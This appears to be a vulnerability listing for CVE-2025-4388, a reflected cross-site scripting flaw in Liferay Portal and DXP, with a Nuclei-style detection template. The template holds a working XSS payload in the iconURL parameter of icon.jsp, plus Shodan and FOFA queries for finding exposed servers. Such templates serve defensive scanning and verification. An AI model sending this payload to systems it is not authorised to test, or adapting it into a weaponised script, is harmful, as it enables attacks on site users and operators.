A reflected cross-site scripting (XSS) vulnerability in the Liferay Portal 7.4.0 through 7.4.3.131, and Liferay DXP 2024.Q4.0 through 2024.Q4.5, 2024.Q3.1 through 2024.Q3.13, 2024.Q2.0 through 2024.Q2.13, 2024.Q1.1 through 2024.Q1.12, 7.4 GA through update 92 allows an remote non-authenticated attacker to inject JavaScript into the modules/apps/marketplace/marketplace-app-manager-web.
PoC代码[已公开]
id: CVE-2025-4388
info:
name: Liferay Portal - Cross-Site Scripting
author: iamnoooob,rootxharsh,pdresearch
severity: medium
description: |
A reflected cross-site scripting (XSS) vulnerability in the Liferay Portal 7.4.0 through 7.4.3.131, and Liferay DXP 2024.Q4.0 through 2024.Q4.5, 2024.Q3.1 through 2024.Q3.13, 2024.Q2.0 through 2024.Q2.13, 2024.Q1.1 through 2024.Q1.12, 7.4 GA through update 92 allows an remote non-authenticated attacker to inject JavaScript into the modules/apps/marketplace/marketplace-app-manager-web.
reference:
- https://liferay.dev/portal/security/known-vulnerabilities/-/asset_publisher/jekt/content/CVE-2025-4388
- https://nvd.nist.gov/vuln/detail/CVE-2025-4388
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N
cvss-score: 6.5
cve-id: CVE-2025-4388
cwe-id: CWE-79
epss-score: 0.06844
epss-percentile: 0.90992
metadata:
verified: true
max-request: 1
shodan-query: html:"liferayPortalCSS"
fofa-query: body="liferayPortalCSS"
tags: cve,cve2025,liferay,marketplace,xss
http:
- method: GET
path:
- "{{BaseURL}}/o/marketplace-app-manager-web/icon.jsp?iconURL=https:///%22%3E%3Cimg%20src=x%20onerror=alert(document.domain)%3E"
matchers-condition: and
matchers:
- type: word
part: body
words:
- 'sticker sticker-'
- '<img src=x onerror=alert(document.domain)>'
condition: and
- type: word
part: content_type
words:
- text/html
- type: status
status:
- 200
# digest: 490a00463044022062fe113c4cb34e63e68177c3832b79769a4b8cfede478a44835101eebdf07bdb02201cc5b767213c5d022b4f305743a333b06c6ed0be07ec87613bda15dd8259e1af:922c64590222798bb761d5b6d8e72950